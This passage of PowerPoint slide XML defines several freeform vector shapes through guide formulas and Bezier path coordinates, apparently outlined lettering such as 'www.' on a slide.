                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168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4" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="114" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168"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7" name="Freeform 128">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C8D4141-63B7-435A-9B5E-2BE7051905AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId29"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4638676" y="2843213"/>
              <a:ext cx="103188" cy="93663"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 220 w 246"/>
                <a:gd name="T1" fmla="*/ 31 h 217"/>
                <a:gd name="T2" fmla="*/ 246 w 246"/>
                <a:gd name="T3" fmla="*/ 15 h 217"/>
                <a:gd name="T4" fmla="*/ 225 w 246"/>
                <a:gd name="T5" fmla="*/ 0 h 217"/>
                <a:gd name="T6" fmla="*/ 167 w 246"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 147 w 246"/>
                <a:gd name="T9" fmla="*/ 15 h 217"/>
                <a:gd name="T10" fmla="*/ 167 w 246"/>
                <a:gd name="T11" fmla="*/ 31 h 217"/>
                <a:gd name="T12" fmla="*/ 192 w 246"/>
                <a:gd name="T13" fmla="*/ 31 h 217"/>
                <a:gd name="T14" fmla="*/ 167 w 246"/>
                <a:gd name="T15" fmla="*/ 179 h 217"/>
                <a:gd name="T16" fmla="*/ 166 w 246"/>
                <a:gd name="T17" fmla="*/ 179 h 217"/>
                <a:gd name="T18" fmla="*/ 152 w 246"/>
                <a:gd name="T19" fmla="*/ 123 h 217"/>
                <a:gd name="T20" fmla="*/ 124 w 246"/>
                <a:gd name="T21" fmla="*/ 86 h 217"/>
                <a:gd name="T22" fmla="*/ 104 w 246"/>
                <a:gd name="T23" fmla="*/ 97 h 217"/>
                <a:gd name="T24" fmla="*/ 81 w 246"/>
                <a:gd name="T25" fmla="*/ 179 h 217"/>
                <a:gd name="T26" fmla="*/ 80 w 246"/>
                <a:gd name="T27" fmla="*/ 179 h 217"/>
                <a:gd name="T28" fmla="*/ 54 w 246"/>
                <a:gd name="T29" fmla="*/ 31 h 217"/>
                <a:gd name="T30" fmla="*/ 79 w 246"/>
                <a:gd name="T31" fmla="*/ 31 h 217"/>
                <a:gd name="T32" fmla="*/ 100 w 246"/>
                <a:gd name="T33" fmla="*/ 16 h 217"/>
                <a:gd name="T34" fmla="*/ 79 w 246"/>
                <a:gd name="T35" fmla="*/ 0 h 217"/>
                <a:gd name="T36" fmla="*/ 21 w 246"/>
                <a:gd name="T37" fmla="*/ 0 h 217"/>
                <a:gd name="T38" fmla="*/ 0 w 246"/>
                <a:gd name="T39" fmla="*/ 15 h 217"/>
                <a:gd name="T40" fmla="*/ 26 w 246"/>
                <a:gd name="T41" fmla="*/ 31 h 217"/>
                <a:gd name="T42" fmla="*/ 56 w 246"/>
                <a:gd name="T43" fmla="*/ 198 h 217"/>
                <a:gd name="T44" fmla="*/ 79 w 246"/>
                <a:gd name="T45" fmla="*/ 217 h 217"/>
                <a:gd name="T46" fmla="*/ 110 w 246"/>
                <a:gd name="T47" fmla="*/ 182 h 217"/>
                <a:gd name="T48" fmla="*/ 124 w 246"/>
                <a:gd name="T49" fmla="*/ 121 h 217"/>
                <a:gd name="T50" fmla="*/ 125 w 246"/>
                <a:gd name="T51" fmla="*/ 121 h 217"/>
                <a:gd name="T52" fmla="*/ 148 w 246"/>
                <a:gd name="T53" fmla="*/ 209 h 217"/>
                <a:gd name="T54" fmla="*/ 168 w 246"/>
                <a:gd name="T55" fmla="*/ 217 h 217"/>
                <a:gd name="T56" fmla="*/ 190 w 246"/>
                <a:gd name="T57" fmla="*/ 198 h 217"/>
                <a:gd name="T58" fmla="*/ 220 w 246"/>
                <a:gd name="T59" fmla="*/ 3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6" h="217">
                  <a:moveTo>
                    <a:pt x="220" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="31"/>
                    <a:pt x="246" y="31"/>
                    <a:pt x="246" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="0"/>
                    <a:pt x="234" y="0"/>
                    <a:pt x="225" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="0"/>
                    <a:pt x="147" y="0"/>
                    <a:pt x="147" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="31"/>
                    <a:pt x="158" y="31"/>
                    <a:pt x="167" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="192" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="166"/>
                    <a:pt x="158" y="144"/>
                    <a:pt x="152" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="92"/>
                    <a:pt x="142" y="86"/>
                    <a:pt x="124" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="86"/>
                    <a:pt x="110" y="86"/>
                    <a:pt x="104" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="101"/>
                    <a:pt x="83" y="169"/>
                    <a:pt x="81" y="179"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="80" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="31"/>
                    <a:pt x="100" y="31"/>
                    <a:pt x="100" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="0"/>
                    <a:pt x="88" y="0"/>
                    <a:pt x="79" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="11" y="31"/>
                    <a:pt x="26" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="198"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="210"/>
                    <a:pt x="59" y="217"/>
                    <a:pt x="79" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="217"/>
                    <a:pt x="101" y="213"/>
                    <a:pt x="110" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="139"/>
                    <a:pt x="123" y="132"/>
                    <a:pt x="124" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="125" y="121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="147"/>
                    <a:pt x="146" y="205"/>
                    <a:pt x="148" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="217"/>
                    <a:pt x="162" y="217"/>
                    <a:pt x="168" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="217"/>
                    <a:pt x="188" y="209"/>
                    <a:pt x="190" y="198"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="220" y="3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8" name="Freeform 129">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{987B5AD2-3A59-481A-A937-4566F79FF5EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId30"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4749801" y="2843213"/>
              <a:ext cx="103188" cy="93663"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 220 w 245"/>
                <a:gd name="T1" fmla="*/ 31 h 217"/>
                <a:gd name="T2" fmla="*/ 245 w 245"/>
                <a:gd name="T3" fmla="*/ 15 h 217"/>
                <a:gd name="T4" fmla="*/ 224 w 245"/>
                <a:gd name="T5" fmla="*/ 0 h 217"/>
                <a:gd name="T6" fmla="*/ 167 w 245"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 146 w 245"/>
                <a:gd name="T9" fmla="*/ 15 h 217"/>
                <a:gd name="T10" fmla="*/ 167 w 245"/>
                <a:gd name="T11" fmla="*/ 31 h 217"/>
                <a:gd name="T12" fmla="*/ 191 w 245"/>
                <a:gd name="T13" fmla="*/ 31 h 217"/>
                <a:gd name="T14" fmla="*/ 166 w 245"/>
                <a:gd name="T15" fmla="*/ 179 h 217"/>
                <a:gd name="T16" fmla="*/ 166 w 245"/>
                <a:gd name="T17" fmla="*/ 179 h 217"/>
                <a:gd name="T18" fmla="*/ 151 w 245"/>
                <a:gd name="T19" fmla="*/ 123 h 217"/>
                <a:gd name="T20" fmla="*/ 124 w 245"/>
                <a:gd name="T21" fmla="*/ 86 h 217"/>
                <a:gd name="T22" fmla="*/ 104 w 245"/>
                <a:gd name="T23" fmla="*/ 97 h 217"/>
                <a:gd name="T24" fmla="*/ 80 w 245"/>
                <a:gd name="T25" fmla="*/ 179 h 217"/>
                <a:gd name="T26" fmla="*/ 80 w 245"/>
                <a:gd name="T27" fmla="*/ 179 h 217"/>
                <a:gd name="T28" fmla="*/ 54 w 245"/>
                <a:gd name="T29" fmla="*/ 31 h 217"/>
                <a:gd name="T30" fmla="*/ 78 w 245"/>
                <a:gd name="T31" fmla="*/ 31 h 217"/>
                <a:gd name="T32" fmla="*/ 99 w 245"/>
                <a:gd name="T33" fmla="*/ 16 h 217"/>
                <a:gd name="T34" fmla="*/ 78 w 245"/>
                <a:gd name="T35" fmla="*/ 0 h 217"/>
                <a:gd name="T36" fmla="*/ 21 w 245"/>
                <a:gd name="T37" fmla="*/ 0 h 217"/>
                <a:gd name="T38" fmla="*/ 0 w 245"/>
                <a:gd name="T39" fmla="*/ 15 h 217"/>
                <a:gd name="T40" fmla="*/ 25 w 245"/>
                <a:gd name="T41" fmla="*/ 31 h 217"/>
                <a:gd name="T42" fmla="*/ 55 w 245"/>
                <a:gd name="T43" fmla="*/ 198 h 217"/>
                <a:gd name="T44" fmla="*/ 79 w 245"/>
                <a:gd name="T45" fmla="*/ 217 h 217"/>
                <a:gd name="T46" fmla="*/ 109 w 245"/>
                <a:gd name="T47" fmla="*/ 182 h 217"/>
                <a:gd name="T48" fmla="*/ 124 w 245"/>
                <a:gd name="T49" fmla="*/ 121 h 217"/>
                <a:gd name="T50" fmla="*/ 124 w 245"/>
                <a:gd name="T51" fmla="*/ 121 h 217"/>
                <a:gd name="T52" fmla="*/ 147 w 245"/>
                <a:gd name="T53" fmla="*/ 209 h 217"/>
                <a:gd name="T54" fmla="*/ 168 w 245"/>
                <a:gd name="T55" fmla="*/ 217 h 217"/>
                <a:gd name="T56" fmla="*/ 190 w 245"/>
                <a:gd name="T57" fmla="*/ 198 h 217"/>
                <a:gd name="T58" fmla="*/ 220 w 245"/>
                <a:gd name="T59" fmla="*/ 3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5" h="217">
                  <a:moveTo>
                    <a:pt x="220" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="31"/>
                    <a:pt x="245" y="31"/>
                    <a:pt x="245" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="0"/>
                    <a:pt x="233" y="0"/>
                    <a:pt x="224" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="0"/>
                    <a:pt x="146" y="0"/>
                    <a:pt x="146" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="31"/>
                    <a:pt x="157" y="31"/>
                    <a:pt x="167" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="191" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="166"/>
                    <a:pt x="157" y="144"/>
                    <a:pt x="151" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="92"/>
                    <a:pt x="141" y="86"/>
                    <a:pt x="124" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="86"/>
                    <a:pt x="109" y="86"/>
                    <a:pt x="104" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="101"/>
                    <a:pt x="82" y="169"/>
                    <a:pt x="80" y="179"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="80" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="31"/>
                    <a:pt x="99" y="31"/>
                    <a:pt x="99" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="0"/>
                    <a:pt x="88" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="10" y="31"/>
                    <a:pt x="25" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="55" y="198"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="210"/>
                    <a:pt x="59" y="217"/>
                    <a:pt x="79" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="217"/>
                    <a:pt x="100" y="213"/>
                    <a:pt x="109" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="139"/>
                    <a:pt x="122" y="132"/>
                    <a:pt x="124" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="124" y="121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="147"/>
                    <a:pt x="145" y="205"/>
                    <a:pt x="147" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="217"/>
                    <a:pt x="162" y="217"/>
                    <a:pt x="168" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="217"/>
                    <a:pt x="188" y="209"/>
                    <a:pt x="190" y="198"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="220" y="3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9" name="Freeform 130">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21C9E15B-B79D-485E-B6A6-37843811D32D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId31"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4859339" y="2843213"/>
              <a:ext cx="104775" cy="93663"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 219 w 245"/>
                <a:gd name="T1" fmla="*/ 31 h 217"/>
                <a:gd name="T2" fmla="*/ 245 w 245"/>
                <a:gd name="T3" fmla="*/ 15 h 217"/>
                <a:gd name="T4" fmla="*/ 224 w 245"/>
                <a:gd name="T5" fmla="*/ 0 h 217"/>
                <a:gd name="T6" fmla="*/ 167 w 245"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 146 w 245"/>
                <a:gd name="T9" fmla="*/ 15 h 217"/>
                <a:gd name="T10" fmla="*/ 167 w 245"/>
                <a:gd name="T11" fmla="*/ 31 h 217"/>
                <a:gd name="T12" fmla="*/ 191 w 245"/>
                <a:gd name="T13" fmla="*/ 31 h 217"/>
                <a:gd name="T14" fmla="*/ 166 w 245"/>
                <a:gd name="T15" fmla="*/ 179 h 217"/>
                <a:gd name="T16" fmla="*/ 166 w 245"/>
                <a:gd name="T17" fmla="*/ 179 h 217"/>
                <a:gd name="T18" fmla="*/ 151 w 245"/>
                <a:gd name="T19" fmla="*/ 123 h 217"/>
                <a:gd name="T20" fmla="*/ 123 w 245"/>
                <a:gd name="T21" fmla="*/ 86 h 217"/>
                <a:gd name="T22" fmla="*/ 103 w 245"/>
                <a:gd name="T23" fmla="*/ 97 h 217"/>
                <a:gd name="T24" fmla="*/ 80 w 245"/>
                <a:gd name="T25" fmla="*/ 179 h 217"/>
                <a:gd name="T26" fmla="*/ 79 w 245"/>
                <a:gd name="T27" fmla="*/ 179 h 217"/>
                <a:gd name="T28" fmla="*/ 53 w 245"/>
                <a:gd name="T29" fmla="*/ 31 h 217"/>
                <a:gd name="T30" fmla="*/ 78 w 245"/>
                <a:gd name="T31" fmla="*/ 31 h 217"/>
                <a:gd name="T32" fmla="*/ 99 w 245"/>
                <a:gd name="T33" fmla="*/ 16 h 217"/>
                <a:gd name="T34" fmla="*/ 78 w 245"/>
                <a:gd name="T35" fmla="*/ 0 h 217"/>
                <a:gd name="T36" fmla="*/ 21 w 245"/>
                <a:gd name="T37" fmla="*/ 0 h 217"/>
                <a:gd name="T38" fmla="*/ 0 w 245"/>
                <a:gd name="T39" fmla="*/ 15 h 217"/>
                <a:gd name="T40" fmla="*/ 25 w 245"/>
                <a:gd name="T41" fmla="*/ 31 h 217"/>
                <a:gd name="T42" fmla="*/ 55 w 245"/>
                <a:gd name="T43" fmla="*/ 198 h 217"/>
                <a:gd name="T44" fmla="*/ 78 w 245"/>
                <a:gd name="T45" fmla="*/ 217 h 217"/>
                <a:gd name="T46" fmla="*/ 109 w 245"/>
                <a:gd name="T47" fmla="*/ 182 h 217"/>
                <a:gd name="T48" fmla="*/ 123 w 245"/>
                <a:gd name="T49" fmla="*/ 121 h 217"/>
                <a:gd name="T50" fmla="*/ 124 w 245"/>
                <a:gd name="T51" fmla="*/ 121 h 217"/>
                <a:gd name="T52" fmla="*/ 147 w 245"/>
                <a:gd name="T53" fmla="*/ 209 h 217"/>
                <a:gd name="T54" fmla="*/ 168 w 245"/>
                <a:gd name="T55" fmla="*/ 217 h 217"/>
                <a:gd name="T56" fmla="*/ 190 w 245"/>
                <a:gd name="T57" fmla="*/ 198 h 217"/>
                <a:gd name="T58" fmla="*/ 219 w 245"/>
                <a:gd name="T59" fmla="*/ 3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5" h="217">
                  <a:moveTo>
                    <a:pt x="219" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="31"/>
                    <a:pt x="245" y="31"/>
                    <a:pt x="245" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="0"/>
                    <a:pt x="233" y="0"/>
                    <a:pt x="224" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="0"/>
                    <a:pt x="146" y="0"/>
                    <a:pt x="146" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="31"/>
                    <a:pt x="157" y="31"/>
                    <a:pt x="167" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="191" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="166"/>
                    <a:pt x="157" y="144"/>
                    <a:pt x="151" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="92"/>
                    <a:pt x="141" y="86"/>
                    <a:pt x="123" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="86"/>
                    <a:pt x="109" y="86"/>
                    <a:pt x="103" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="101"/>
                    <a:pt x="82" y="169"/>
                    <a:pt x="80" y="179"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="31"/>
                    <a:pt x="99" y="31"/>
                    <a:pt x="99" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="0"/>
                    <a:pt x="87" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="10" y="31"/>
                    <a:pt x="25" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="55" y="198"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="210"/>
                    <a:pt x="58" y="217"/>
                    <a:pt x="78" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="217"/>
                    <a:pt x="100" y="213"/>
                    <a:pt x="109" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="139"/>
                    <a:pt x="122" y="132"/>
                    <a:pt x="123" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="124" y="121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="147"/>
                    <a:pt x="145" y="205"/>
                    <a:pt x="147" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="217"/>
                    <a:pt x="162" y="217"/>
                    <a:pt x="168" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="217"/>
                    <a:pt x="188" y="209"/>
                    <a:pt x="190" y="198"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="219" y="3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0" name="Freeform 131">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9612F2F-4656-4AD2-B6E1-56BD64179F70}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId32"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5010151" y="2909888"/>
              <a:ext cx="25400" cy="26988"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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1" name="Freeform 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEA5593C-CCEE-4ADB-BCA9-420F72AE64E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId33"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5083176" y="2803525"/>
              <a:ext cx="100013" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 234"/>
                <a:gd name="T1" fmla="*/ 142 h 304"/>
                <a:gd name="T2" fmla="*/ 188 w 234"/>
